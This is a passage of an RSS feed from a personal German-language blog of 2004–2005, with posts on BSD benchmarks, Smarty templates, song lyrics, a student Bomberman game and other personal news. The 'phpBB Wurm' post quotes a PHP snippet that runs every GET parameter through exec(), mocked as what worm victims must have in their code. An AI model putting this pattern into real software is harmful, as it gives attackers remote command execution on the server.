  11025. <p>The results clearly indicate that recent architectural decisions in the NetBSD operating system have closed the performance gap between NetBSD and FreeBSD. In fact, NetBSD has surpassed FreeBSD in performance in the areas investigated in this paper. Significant performance improvements are obviously visible in the thread implementation.</p>
  11026. </blockquote>
  11027. ]]></description>
  11028.    <content:encoded><![CDATA[<p>Gregory McGarry has made a <a href="" title="Benchmark Comparison of NetBSD 2.0 and FreeBSD 5.3">benchmark comparison between NetBSD 2.0 and FreeBSD 5.3</a>.<br>(<a href="" title="NetBSD vs FreeBSD (der Benchmark) (">via mindtrap::weblog</a>)</p>
  11029. <p>The main differences are that NetBSD scales <i>O</i>(1) on forking new
  11030. processes while FreeBSD scales <i>O</i>(<i>n</i>). For memory mapping and socket
  11031. creation both scale <i>O</i>(1) but NetBSD is twice as fast as FreeBSD
  11032. <br>But for binding addresses to sockets, FreeBSD scales <i>O</i>(1) while
  11033. NetBSD scales <i>O</i>(<i>n</i>) but is twice as fast for a small number of bound
  11034. sockets. Also for POSIX thread creation FreeBSD scales <i>O</i>(1) while
  11035. NetBSD scales something like <i>O</i>(<i>n</i>) and is twice as fast for a small
  11036. number of threads.</p>
  11037. <blockquote cite="">
  11038. <p>This paper has presented a suite of benchmarks and results for comparing the performance of NetBSD 2.0 and FreeBSD 5.3 in the areas of core operating system functionality, network scalability and thread performance.</p>
  11039. <p>The results clearly indicate that recent architectural decisions in the NetBSD operating system have closed the performance gap between NetBSD and FreeBSD. In fact, NetBSD has surpassed FreeBSD in performance in the areas investigated in this paper. Significant performance improvements are obviously visible in the thread implementation.</p>
  11040. </blockquote>
  11041. ]]></content:encoded>
  11042.  </item>
  11044.  <item>
  11045.    <title>Nightwish - The Pharaoh Sails To Orion</title>
  11046.    <link></link>
  11047.    <guid isPermaLink="true"></guid>
  11048.    <dc:creator>Andreas Jaggi</dc:creator>
  11049.    <creativeCommons:license></creativeCommons:license>
  11050.    <pubDate>Thu, 06 Jan 2005 14:24:02 +0100</pubDate>
  11051.    <category domain="">Music</category>
  11052.    <description><![CDATA[<img src="" alt="Nightwish - Oceanborn" title="Nightwish - Oceanborn" width="202" height="200">
  11053. <p>&quot;Get away from me!<br>
  11054. Take heed to thyself and see my face no more!<br>
  11055. for in the day Thou see my face<br>
  11056. Thou shalt die!&quot;<br>
  11057. &#8211; Exodus 10:28</p>
  11058. <br><br>
  11059. <p>A constellation of divine architecture built on Earth<br>
  11060. A holy harbour &#8211; Orion<br>
  11061. Nautical ascension to the firmament
  11062. </p>
  11064. <p>
  11065. Ship-shaped barrows open my heart to the wisdom of this land<br>
  11066. Sailing with the Serpent Chimera of a fiendish sandman
  11067. </p>
  11069. <p>
  11070. The Unicorn arrives with the westwind to dream His funeral<br>
  11071. &quot;Thou art born for Horus dwells in Thee&quot;
  11072. </p>
  11074. <p>
  11075. Slumbering with the ebb and the flow of this foaming tomb<br>
  11076. &quot;Thou art born for Seteh dwells in Thee&quot;
  11077. </p>
  11079. <p>
  11080. Reveal your face to me and guide me through the Stygian fields<br>
  11081. Enthral my soul to Sepedet&rsquo;s beams to serve Your will
  11082. </p>
  11084. <p>
  11085. <i>Sailing on the distant seas from darkness to deliverance<br>
  11086. Tales like the ocean written to the Draco&rsquo;s glance
  11087. </i></p>
  11089. <p>
  11090. <i>Ruling with the scythe of death you tear our philosophies apart<br>
  11091. An ancient starwalk to merge into the stars</i>
  11092. </p>
  11094. <p>
  11095. &quot;Open thy veins for my venom<br>
  11096. Kiss the cobras with thy twisted tongue<br>
  11097. So shalt thou join the empyrean circus<br>
  11098. Where beggars mourn and seraphs dance<br>
  11099. In this twilight cathedral<br>
  11100. Shall I wed thee,<br>
  11101. O Bride of the Netherworld&quot;
  11102. </p>
  11104. <p>
  11105. <i>Sailing on the distant seas...</i>
  11106. </p>
  11108. <p>
  11109. Join my soul the Hunter in the sky
  11110. </p>
  11111. ]]></description>
  11112.    <content:encoded><![CDATA[<img src="" alt="Nightwish - Oceanborn" title="Nightwish - Oceanborn" width="202" height="200">
  11113. <p>&quot;Get away from me!<br>
  11114. Take heed to thyself and see my face no more!<br>
  11115. for in the day Thou see my face<br>
  11116. Thou shalt die!&quot;<br>
  11117. &#8211; Exodus 10:28</p>
  11118. <br><br>
  11119. <p>A constellation of divine architecture built on Earth<br>
  11120. A holy harbour &#8211; Orion<br>
  11121. Nautical ascension to the firmament
  11122. </p>
  11124. <p>
  11125. Ship-shaped barrows open my heart to the wisdom of this land<br>
  11126. Sailing with the Serpent Chimera of a fiendish sandman
  11127. </p>
  11129. <p>
  11130. The Unicorn arrives with the westwind to dream His funeral<br>
  11131. &quot;Thou art born for Horus dwells in Thee&quot;
  11132. </p>
  11134. <p>
  11135. Slumbering with the ebb and the flow of this foaming tomb<br>
  11136. &quot;Thou art born for Seteh dwells in Thee&quot;
  11137. </p>
  11139. <p>
  11140. Reveal your face to me and guide me through the Stygian fields<br>
  11141. Enthral my soul to Sepedet&rsquo;s beams to serve Your will
  11142. </p>
  11144. <p>
  11145. <i>Sailing on the distant seas from darkness to deliverance<br>
  11146. Tales like the ocean written to the Draco&rsquo;s glance
  11147. </i></p>
  11149. <p>
  11150. <i>Ruling with the scythe of death you tear our philosophies apart<br>
  11151. An ancient starwalk to merge into the stars</i>
  11152. </p>
  11154. <p>
  11155. &quot;Open thy veins for my venom<br>
  11156. Kiss the cobras with thy twisted tongue<br>
  11157. So shalt thou join the empyrean circus<br>
  11158. Where beggars mourn and seraphs dance<br>
  11159. In this twilight cathedral<br>
  11160. Shall I wed thee,<br>
  11161. O Bride of the Netherworld&quot;
  11162. </p>
  11164. <p>
  11165. <i>Sailing on the distant seas...</i>
  11166. </p>
  11168. <p>
  11169. Join my soul the Hunter in the sky
  11170. </p>
  11171. ]]></content:encoded>
  11172.  </item>
  11174.  <item>
  11175.    <title>Smarty</title>
  11176.    <link></link>
  11177.    <guid isPermaLink="true"></guid>
  11178.    <dc:creator>Andreas Jaggi</dc:creator>
  11179.    <creativeCommons:license></creativeCommons:license>
  11180.    <pubDate>Thu, 06 Jan 2005 00:28:21 +0100</pubDate>
  11181.    <category domain="">Coding</category>
  11182.    <description><![CDATA[<p>Angeregt durch <a href="" title="mindtrap::weblog (">Gordons</a> Smarty <a href="" title="Smarty Templates (">Posting</a> gibts es hier nun auch einen Eintrag über Template Systeme und ein paar interessante Links.</p>
  11183. <p>Angefangen hat das mit den Templates, als ich vor 2 Jahren die <a href="" title="Willkommen auf der Website der 1F (">Website</a> für meine Klasse des Gymnasiums <a href="" title="x-log:">gemacht habe</a>. Damals benutze ich die <a href="" title="P.E.T.: PHP Processor Engine for Templates (">P.E.T.</a> Template-Engine von <a href="" title="Andreas Demmer (">Andreas Demmer</a>.<br>
  11184. In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: &lt;!-- {tag} --&gt;</p>
  11186. <p>Als ich vor einem Jahr mein Weblog komplett neu programmierte,
  11187. wollte ich auch ein Template-System benutzen, aber ohne so umständliche
  11188. Tags.<br>
  11189. Inspiriert von <a href="" title="Brian Lozier - Template Engines">diesem Artikel</a>
  11190. habe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderes
  11191. macht, als ein paar Variablen zu speichern und eine Template-Datei zu
  11192. inkludieren. Die Template-Tags sind auf &lt;?=$tag;?&gt; geschrumpft
  11193. und man kann die ganze Vielfalt von PHP nutzen ohne die Template-Datei
  11194. speziell zu parsen.</p>
  11196. <p>
  11197. Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des <a href="" title="Knowledge and Information Services">KIS</a> gemeldet. Als Anforderung wurden unter anderem <a href="" title="Smart : Template Engine">Smarty</a> Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.</p>
  11199. <p>Früher habe ich mich etwas vor Smarty gedrückt, weil es mir etwas schwerfällig schien mit Template-Kompilierung, Caching etc.<br>
  11200. Doch
  11201. seit ich mich intensiv damit beschäftige und auch entdecken durfte,
  11202. dass die kompilierten Templates eigentlich genau meinem
  11203. &quot;include&quot;-Template System entsprechen, habe ich meine Meinung geändert.<br>
  11204. Nun setzte ich Smarty auch bei eigenen Projekten ein.</p>
  11206. <p>Hier noch ein paar gesammelte Links zu Smarty:</p>
  11208. <ul>
  11209. <li class="gone"><a href="#" title="Smarty i18n Plugin">Smarty i18n Plugin</a> &ndash; Internationalisierung für Smarty</li>
  11210. <li><a href="" title="SmartyValidate">SmartyValidate</a> &ndash; Form Validation mit Smarty</li>
  11211. <li><a href="" title="PHP/MySQL-Anwendungen: Ein Plädoyer für Smarty (">Ein Plädoyer für Smarty</a></li>
  11212. <li class="gone"><a href="#" title="Smarty - BeWiki">BeWiki &ndash; Smarty</a> &ndash; Linksammlung</li>
  11213. <li><a href="" title="SmartyPlugins (">Smarty Plugin Verzeichnis</a></li>
  11214. </ul>
  11216. ]]></description>
  11217.    <content:encoded><![CDATA[<p>Angeregt durch <a href="" title="mindtrap::weblog (">Gordons</a> Smarty <a href="" title="Smarty Templates (">Posting</a> gibts es hier nun auch einen Eintrag über Template Systeme und ein paar interessante Links.</p>
  11218. <p>Angefangen hat das mit den Templates, als ich vor 2 Jahren die <a href="" title="Willkommen auf der Website der 1F (">Website</a> für meine Klasse des Gymnasiums <a href="" title="x-log:">gemacht habe</a>. Damals benutze ich die <a href="" title="P.E.T.: PHP Processor Engine for Templates (">P.E.T.</a> Template-Engine von <a href="" title="Andreas Demmer (">Andreas Demmer</a>.<br>
  11219. In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: &lt;!-- {tag} --&gt;</p>
  11221. <p>Als ich vor einem Jahr mein Weblog komplett neu programmierte,
  11222. wollte ich auch ein Template-System benutzen, aber ohne so umständliche
  11223. Tags.<br>
  11224. Inspiriert von <a href="" title="Brian Lozier - Template Engines">diesem Artikel</a>
  11225. habe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderes
  11226. macht, als ein paar Variablen zu speichern und eine Template-Datei zu
  11227. inkludieren. Die Template-Tags sind auf &lt;?=$tag;?&gt; geschrumpft
  11228. und man kann die ganze Vielfalt von PHP nutzen ohne die Template-Datei
  11229. speziell zu parsen.</p>
  11231. <p>
  11232. Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des <a href="" title="Knowledge and Information Services">KIS</a> gemeldet. Als Anforderung wurden unter anderem <a href="" title="Smart : Template Engine">Smarty</a> Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.</p>
  11234. <p>Früher habe ich mich etwas vor Smarty gedrückt, weil es mir etwas schwerfällig schien mit Template-Kompilierung, Caching etc.<br>
  11235. Doch
  11236. seit ich mich intensiv damit beschäftige und auch entdecken durfte,
  11237. dass die kompilierten Templates eigentlich genau meinem
  11238. &quot;include&quot;-Template System entsprechen, habe ich meine Meinung geändert.<br>
  11239. Nun setzte ich Smarty auch bei eigenen Projekten ein.</p>
  11241. <p>Hier noch ein paar gesammelte Links zu Smarty:</p>
  11243. <ul>
  11244. <li class="gone"><a href="#" title="Smarty i18n Plugin">Smarty i18n Plugin</a> &ndash; Internationalisierung für Smarty</li>
  11245. <li><a href="" title="SmartyValidate">SmartyValidate</a> &ndash; Form Validation mit Smarty</li>
  11246. <li><a href="" title="PHP/MySQL-Anwendungen: Ein Plädoyer für Smarty (">Ein Plädoyer für Smarty</a></li>
  11247. <li class="gone"><a href="#" title="Smarty - BeWiki">BeWiki &ndash; Smarty</a> &ndash; Linksammlung</li>
  11248. <li><a href="" title="SmartyPlugins (">Smarty Plugin Verzeichnis</a></li>
  11249. </ul>
  11251. ]]></content:encoded>
  11252.  </item>
  11254.  <item>
  11255.    <title>English</title>
  11256.    <link></link>
  11257.    <guid isPermaLink="true"></guid>
  11258.    <dc:creator>Andreas Jaggi</dc:creator>
  11259.    <creativeCommons:license></creativeCommons:license>
  11260.    <pubDate>Wed, 05 Jan 2005 17:21:35 +0100</pubDate>
  11261.    <category domain="">Misc</category>
  11262.    <description><![CDATA[<p>Motivated by Joel&#8217;s <a href="" title="Joel on Software -  Advice for Computer Science College Students">Advice for Computer Science College Students</a> i beginn now to blog also in english. The target is to improve my written english skills.<br>
  11263. I hope that this experiment doesn&#8217;t result like the french one, which
  11264. is dying poorly since i daily speak french and don&#8217;t write in it
  11265. anymore.</p>
  11266. ]]></description>
  11267.    <content:encoded><![CDATA[<p>Motivated by Joel&#8217;s <a href="" title="Joel on Software -  Advice for Computer Science College Students">Advice for Computer Science College Students</a> i beginn now to blog also in english. The target is to improve my written english skills.<br>
  11268. I hope that this experiment doesn&#8217;t result like the french one, which
  11269. is dying poorly since i daily speak french and don&#8217;t write in it
  11270. anymore.</p>
  11271. ]]></content:encoded>
  11272.  </item>
  11274.  <item>
  11275.    <title>phpBB Wurm</title>
  11276.    <link></link>
  11277.    <guid isPermaLink="true"></guid>
  11278.    <dc:creator>Andreas Jaggi</dc:creator>
  11279.    <creativeCommons:license></creativeCommons:license>
  11280.    <pubDate>Sun, 26 Dec 2004 01:43:52 +0100</pubDate>
  11281.    <category domain="">Coding</category>
  11282.    <description><![CDATA[<p>Seit heute Abend bekomme ich von folgenden Hosts etwas <a href="" title=" Wurm attackiert PHP-Skripte">'spezielle'</a> HTTP Anfragen, welche hier zum Glück wirkungslos sind:<br>
  11283. </p>
  11284. <ul>
  11285.  <li></li>
  11286.  <li></li>
  11287.  <li></li>
  11288.  <li></li>
  11289.  <li></li>
  11290.  <li></li>
  11291.  <li></li>
  11292.  <li></li>
  11293.  <li></li>
  11294.  <li></li>
  11295.  <li></li>
  11296.  <li></li>
  11297.  <li></li>
  11298.  <li></li>
  11299.  <li></li>
  11300.  <li></li>
  11301.  <li>...</li>
  11302. </ul>
  11303. <p>Dazu <a href="#" title="Zur Weihnacht ist Hochbetrieb" class="gone"></a>:<br>
  11304. </p>
  11305. <blockquote cite="">
  11306. <p>Beeindruckend ist die Anzahl von Opfern, die irgendwie sowas in ihren Sourcen haben müssen.</p><pre>&lt;?php<br>foreach ($_GET as $_get) {<br>    exec ($_get);<br>}<br>?&gt;
  11307. </pre></blockquote>
  11308. ]]></description>
  11309.    <content:encoded><![CDATA[<p>Seit heute Abend bekomme ich von folgenden Hosts etwas <a href="" title=" Wurm attackiert PHP-Skripte">'spezielle'</a> HTTP Anfragen, welche hier zum Glück wirkungslos sind:<br>
  11310. </p>
  11311. <ul>
  11312.  <li></li>
  11313.  <li></li>
  11314.  <li></li>
  11315.  <li></li>
  11316.  <li></li>
  11317.  <li></li>
  11318.  <li></li>
  11319.  <li></li>
  11320.  <li></li>
  11321.  <li></li>
  11322.  <li></li>
  11323.  <li></li>
  11324.  <li></li>
  11325.  <li></li>
  11326.  <li></li>
  11327.  <li></li>
  11328.  <li>...</li>
  11329. </ul>
  11330. <p>Dazu <a href="#" title="Zur Weihnacht ist Hochbetrieb" class="gone"></a>:<br>
  11331. </p>
  11332. <blockquote cite="">
  11333. <p>Beeindruckend ist die Anzahl von Opfern, die irgendwie sowas in ihren Sourcen haben müssen.</p><pre>&lt;?php<br>foreach ($_GET as $_get) {<br>    exec ($_get);<br>}<br>?&gt;
  11334. </pre></blockquote>
  11335. ]]></content:encoded>
  11336.  </item>
  11338.  <item>
  11339.    <title>Weihnachten</title>
  11340.    <link></link>
  11341.    <guid isPermaLink="true"></guid>
  11342.    <dc:creator>Andreas Jaggi</dc:creator>
  11343.    <creativeCommons:license></creativeCommons:license>
  11344.    <pubDate>Fri, 24 Dec 2004 17:59:46 +0100</pubDate>
  11345.    <category domain="">Misc</category>
  11346.    <description><![CDATA[Frohe Festtage!
  11347. ]]></description>
  11348.    <content:encoded><![CDATA[Frohe Festtage!
  11349. ]]></content:encoded>
  11350.  </item>
  11352.  <item>
  11353.    <title>Noël</title>
  11354.    <link></link>
  11355.    <guid isPermaLink="true"></guid>
  11356.    <dc:creator>Andreas Jaggi</dc:creator>
  11357.    <creativeCommons:license></creativeCommons:license>
  11358.    <pubDate>Fri, 24 Dec 2004 17:58:11 +0100</pubDate>
  11359.    <category domain="">Misc</category>
  11360.    <description><![CDATA[Joyeuses f&#234;tes!
  11362. ]]></description>
  11363.    <content:encoded><![CDATA[Joyeuses f&#234;tes!
  11365. ]]></content:encoded>
  11366.  </item>
  11368.  <item>
  11369.    <title>Gmail</title>
  11370.    <link></link>
  11371.    <guid isPermaLink="true"></guid>
  11372.    <dc:creator>Andreas Jaggi</dc:creator>
  11373.    <creativeCommons:license></creativeCommons:license>
  11374.    <pubDate>Thu, 16 Sep 2004 21:14:23 +0200</pubDate>
  11375.    <category domain="">Misc</category>
  11376.    <description><![CDATA[<p>Seit neustem habe auch ich so einen <a href="" lang="en" title="Welcome to Gmail">Gmail</a>-Account und habe nun einige Einladungen zu verschenken.<br>Wer Interesse daran hat, soll sich melden.</p>
  11377. ]]></description>
  11378.    <content:encoded><![CDATA[<p>Seit neustem habe auch ich so einen <a href="" lang="en" title="Welcome to Gmail">Gmail</a>-Account und habe nun einige Einladungen zu verschenken.<br>Wer Interesse daran hat, soll sich melden.</p>
  11379. ]]></content:encoded>
  11380.  </item>
  11382.  <item>
  11383.    <title>NetBSD</title>
  11384.    <link></link>
  11385.    <guid isPermaLink="true"></guid>
  11386.    <dc:creator>Andreas Jaggi</dc:creator>
  11387.    <creativeCommons:license></creativeCommons:license>
  11388.    <pubDate>Mon, 23 Aug 2004 23:20:28 +0200</pubDate>
  11389.    <category domain="">NetBSD</category>
  11390.    <description><![CDATA[<p><a href="" title="Mach and Darwin binary compatibility for NetBSD/powerpc and NetBSD/i386" lang="en">Hier</a> wird versucht Mac OS X Anwendungen unter <a href="" title="The NetBSD Project">NetBSD</a> zum laufen zu bringen.</p><p>Da ich auf meinem PowerBook gerne einige kommerzielle Programme benutzen möchte, aber dennoch auf die Programmvielfalt eines "freien" Unixsystems nicht verzichten möchte, habe ich vor mich in Zukunft etwas mit <a href="" title="The NetBSD Project">NetBSD</a> zu beschäftigen.</p><p>Der erste Schritt dazu ist schon gemacht: Seit gestern Abend läuft auf meinem alten Testrechner <a href="" title="The NetBSD Project">NetBSD</a> 1.6.2 :-)</p>
  11391. ]]></description>
  11392.    <content:encoded><![CDATA[<p><a href="" title="Mach and Darwin binary compatibility for NetBSD/powerpc and NetBSD/i386" lang="en">Hier</a> wird versucht Mac OS X Anwendungen unter <a href="" title="The NetBSD Project">NetBSD</a> zum laufen zu bringen.</p><p>Da ich auf meinem PowerBook gerne einige kommerzielle Programme benutzen möchte, aber dennoch auf die Programmvielfalt eines "freien" Unixsystems nicht verzichten möchte, habe ich vor mich in Zukunft etwas mit <a href="" title="The NetBSD Project">NetBSD</a> zu beschäftigen.</p><p>Der erste Schritt dazu ist schon gemacht: Seit gestern Abend läuft auf meinem alten Testrechner <a href="" title="The NetBSD Project">NetBSD</a> 1.6.2 :-)</p>
  11393. ]]></content:encoded>
  11394.  </item>
  11396.  <item>
  11397.    <title>Examens Propédeutique I</title>
  11398.    <link></link>
  11399.    <guid isPermaLink="true"></guid>
  11400.    <dc:creator>Andreas Jaggi</dc:creator>
  11401.    <creativeCommons:license></creativeCommons:license>
  11402.    <pubDate>Sat, 31 Jul 2004 13:38:40 +0200</pubDate>
  11403.    <category domain="">School</category>
  11404.    <description><![CDATA[<q>Examen réussi sur décision de la Conférence des notes</q> :-)
  11405. ]]></description>
  11406.    <content:encoded><![CDATA[<q>Examen réussi sur décision de la Conférence des notes</q> :-)
  11407. ]]></content:encoded>
  11408.  </item>
  11410.  <item>
  11411.    <title>Anschauen!</title>
  11412.    <link></link>
  11413.    <guid isPermaLink="true"></guid>
  11414.    <dc:creator>Andreas Jaggi</dc:creator>
  11415.    <creativeCommons:license></creativeCommons:license>
  11416.    <pubDate>Sun, 25 Jul 2004 00:25:23 +0200</pubDate>
  11417.    <category domain="">Webdesign</category>
  11418.    <description><![CDATA[<a href="" title="collecting best practice webdesign resources (">collecting best practice webdesign resources</a>
  11419. ]]></description>
  11420.    <content:encoded><![CDATA[<a href="" title="collecting best practice webdesign resources (">collecting best practice webdesign resources</a>
  11421. ]]></content:encoded>
  11422.  </item>
  11424.  <item>
  11425.    <title>Quicklinks Webdesign</title>
  11426.    <link></link>
  11427.    <guid isPermaLink="true"></guid>
  11428.    <dc:creator>Andreas Jaggi</dc:creator>
  11429.    <creativeCommons:license></creativeCommons:license>
  11430.    <pubDate>Tue, 06 Jul 2004 19:15:50 +0200</pubDate>
  11431.    <category domain="">Webdesign</category>
  11432.    <description><![CDATA[<ul><li><a href="" title="Rounded Corners in CSS (">Rounded Corners in CSS</a> via <a href="" title="social bookmarks"></a></li><li><a href="" title="CSS Photo Zoom">CSS Photo Zoom</a>  via <a href="" title="LinkDump">LinkDump</a></li><li><a href="" title="Flash Interface Design Made Simple">Flash Interface Design</a> via <a href="" title="metamorphine (">metamorphine</a></li></ul>
  11433. ]]></description>
  11434.    <content:encoded><![CDATA[<ul><li><a href="" title="Rounded Corners in CSS (">Rounded Corners in CSS</a> via <a href="" title="social bookmarks"></a></li><li><a href="" title="CSS Photo Zoom">CSS Photo Zoom</a>  via <a href="" title="LinkDump">LinkDump</a></li><li><a href="" title="Flash Interface Design Made Simple">Flash Interface Design</a> via <a href="" title="metamorphine (">metamorphine</a></li></ul>
  11435. ]]></content:encoded>
  11436.  </item>
  11438.  <item>
  11439.    <title>Bomberman 2004</title>
  11440.    <link></link>
  11441.    <guid isPermaLink="true"></guid>
  11442.    <dc:creator>Andreas Jaggi</dc:creator>
  11443.    <creativeCommons:license></creativeCommons:license>
  11444.    <pubDate>Sat, 03 Jul 2004 22:20:51 +0200</pubDate>
  11445.    <category domain="">Coding</category>
  11446.    <description><![CDATA[<p>Wie <a href="" title="Projekt mit CVS">schon angekündigt</a> haben wir im Programmieren ein Projekt gemacht, welches nun letzten Sonntag fertig wurde. Herausgekommen ist ein kleines Bomberman-Spiel, welches man <a href="" title="">hier</a>  herunterladen kann (für Interessierte gibts <a href="" title="Bomberman Sourcen">hier</a> noch die Sourcen).</p><p>Das Spiel hat ziemlich viele Bugs und Fehler, welche vor allem daher kommen, dass wir die ganze Spiel-Engine von den Assistenten geliefert bekammen. Die Engine ist jedoch ohne ein intelligentes Design, mit lauter Fehlern und Exceptions und in einem schrecklichen Code-Stil gemacht worden. So braucht beispielsweise der Konstruktor der Klasse, welche die Netzwerk-Sockets erstellt, eine Referenz auf ein GUI-Element um allfällige Netzwerkfehler direkt dorthinein zu schreiben!</p><p>Und auch die langen Wartezeiten beim starten von Spielen sind nur da, weil die Engine mit vielen NullPointer-Exceptions abstürzt wenn ein Spiel in Echtzeit gestartet wird!</p><p>Programmiert haben wir eigentlich "nur" die künstliche Intelligenz, den Leveleditor und das Fenster um die verschiedenen Spieltypen auszuwählen (Ursprünglich musste der Benutzer mittels Kommandozeile die einzelnen Clients und Server starten und miteinander verbinden!).</p><p>Wer keinen Fernseher hat, kann im Simulationsmodus schauen wie die künstliche Intelligenz gegen sich selbst spielt. Das kann durchaus eine abendfüllende Spielzeit annehmen!</p>
  11447. ]]></description>
  11448.    <content:encoded><![CDATA[<p>Wie <a href="" title="Projekt mit CVS">schon angekündigt</a> haben wir im Programmieren ein Projekt gemacht, welches nun letzten Sonntag fertig wurde. Herausgekommen ist ein kleines Bomberman-Spiel, welches man <a href="" title="">hier</a>  herunterladen kann (für Interessierte gibts <a href="" title="Bomberman Sourcen">hier</a> noch die Sourcen).</p><p>Das Spiel hat ziemlich viele Bugs und Fehler, welche vor allem daher kommen, dass wir die ganze Spiel-Engine von den Assistenten geliefert bekammen. Die Engine ist jedoch ohne ein intelligentes Design, mit lauter Fehlern und Exceptions und in einem schrecklichen Code-Stil gemacht worden. So braucht beispielsweise der Konstruktor der Klasse, welche die Netzwerk-Sockets erstellt, eine Referenz auf ein GUI-Element um allfällige Netzwerkfehler direkt dorthinein zu schreiben!</p><p>Und auch die langen Wartezeiten beim starten von Spielen sind nur da, weil die Engine mit vielen NullPointer-Exceptions abstürzt wenn ein Spiel in Echtzeit gestartet wird!</p><p>Programmiert haben wir eigentlich "nur" die künstliche Intelligenz, den Leveleditor und das Fenster um die verschiedenen Spieltypen auszuwählen (Ursprünglich musste der Benutzer mittels Kommandozeile die einzelnen Clients und Server starten und miteinander verbinden!).</p><p>Wer keinen Fernseher hat, kann im Simulationsmodus schauen wie die künstliche Intelligenz gegen sich selbst spielt. Das kann durchaus eine abendfüllende Spielzeit annehmen!</p>
  11449. ]]></content:encoded>
  11450.  </item>
  11452.  <item>
  11453.    <title>Analysis überlebt!</title>
  11454.    <link></link>
  11455.    <guid isPermaLink="true"></guid>
  11456.    <dc:creator>Andreas Jaggi</dc:creator>
  11457.    <creativeCommons:license></creativeCommons:license>
  11458.    <pubDate>Sat, 03 Jul 2004 22:10:05 +0200</pubDate>
  11459.    <category domain="">School</category>
  11460.    <description><![CDATA[<p>Hier hat sich in den letzten paar Wochen nicht sehr viel geändert, da ich Prüfungen hatte und noch habe.</p><p>Jedoch ist das Schlimmste seit heute Morgen vorbei :-)</p>
  11461. ]]></description>
  11462.    <content:encoded><![CDATA[<p>Hier hat sich in den letzten paar Wochen nicht sehr viel geändert, da ich Prüfungen hatte und noch habe.</p><p>Jedoch ist das Schlimmste seit heute Morgen vorbei :-)</p>
  11463. ]]></content:encoded>
  11464.  </item>
  11466.  <item>
  11467.    <title>PowerBook Buttons</title>
  11468.    <link></link>
  11469.    <guid isPermaLink="true"></guid>
  11470.    <dc:creator>Andreas Jaggi</dc:creator>
  11471.    <creativeCommons:license></creativeCommons:license>
  11472.    <pubDate>Thu, 17 Jun 2004 14:12:01 +0200</pubDate>
  11473.    <category domain="">Mac</category>
  11474.    <description><![CDATA[<p>Nachdem ich <a href="" title="LinuxChix Kernel Hacking Lessons">diese Artikel</a> gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.</p><p>Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts <a href="">hier</a> einen Patch für den 2.6.3 Kernel :-)</p><p>*kernelhacking*</p>
  11475. ]]></description>
  11476.    <content:encoded><![CDATA[<p>Nachdem ich <a href="" title="LinuxChix Kernel Hacking Lessons">diese Artikel</a> gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.</p><p>Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts <a href="">hier</a> einen Patch für den 2.6.3 Kernel :-)</p><p>*kernelhacking*</p>
  11477. ]]></content:encoded>
  11478.  </item>
  11480.  <item>
  11481.    <title>Alle 20 Minuten Spam</title>
  11482.    <link></link>
  11483.    <guid isPermaLink="true"></guid>
  11484.    <dc:creator>Andreas Jaggi</dc:creator>
  11485.    <creativeCommons:license></creativeCommons:license>
  11486.    <pubDate>Sat, 12 Jun 2004 23:32:56 +0200</pubDate>
  11487.    <category domain="">Misc</category>
  11488.    <description><![CDATA[<p>Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. Glücklicherweise hat mein Spam-Filter 780 davon erkannt :-)</p>
  11489. ]]></description>
  11490.    <content:encoded><![CDATA[<p>Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. Glücklicherweise hat mein Spam-Filter 780 davon erkannt :-)</p>
  11491. ]]></content:encoded>
  11492.  </item>
  11494.  <item>
  11495.    <title>phpPatterns()</title>
  11496.    <link></link>
  11497.    <guid isPermaLink="true"></guid>
  11498.    <dc:creator>Andreas Jaggi</dc:creator>
  11499.    <creativeCommons:license></creativeCommons:license>
  11500.    <pubDate>Sat, 12 Jun 2004 21:30:02 +0200</pubDate>
  11501.    <category domain="">Coding</category>
  11502.    <description><![CDATA[<p>Auf <a href="" title=":: phpPatterns()">phpPatterns()</a> findet man viele Artikel zu Patterns und Objektorientierter Programmierung.</p><p>Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.</p>
  11503. ]]></description>
  11504.    <content:encoded><![CDATA[<p>Auf <a href="" title=":: phpPatterns()">phpPatterns()</a> findet man viele Artikel zu Patterns und Objektorientierter Programmierung.</p><p>Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.</p>
  11505. ]]></content:encoded>
  11506.  </item>
  11508.  <item>
  11509.    <title>Vim 6.3</title>
  11510.    <link></link>
  11511.    <guid isPermaLink="true"></guid>
  11512.    <dc:creator>Andreas Jaggi</dc:creator>
  11513.    <creativeCommons:license></creativeCommons:license>
  11514.    <pubDate>Wed, 09 Jun 2004 21:23:35 +0200</pubDate>
  11515.    <category domain="">Linux</category>
  11516.    <description><![CDATA[<p>Von <a href="" title=""><abbr title="Vi IMproved">Vim</abbr></a> ist <a href="" title="vimannounce">Version 6.3 erschienen.</a></p><p>Via <a href="" title="">theflow</a></p>
  11517. ]]></description>
  11518.    <content:encoded><![CDATA[<p>Von <a href="" title=""><abbr title="Vi IMproved">Vim</abbr></a> ist <a href="" title="vimannounce">Version 6.3 erschienen.</a></p><p>Via <a href="" title="">theflow</a></p>
  11519. ]]></content:encoded>
  11520.  </item>
  11522.  <item>
  11523.    <title>Money, Money, Money</title>
  11524.    <link></link>
  11525.    <guid isPermaLink="true"></guid>
  11526.    <dc:creator>Andreas Jaggi</dc:creator>
  11527.    <creativeCommons:license></creativeCommons:license>
  11528.    <pubDate>Wed, 09 Jun 2004 20:40:01 +0200</pubDate>
  11529.    <category domain="">Linux</category>
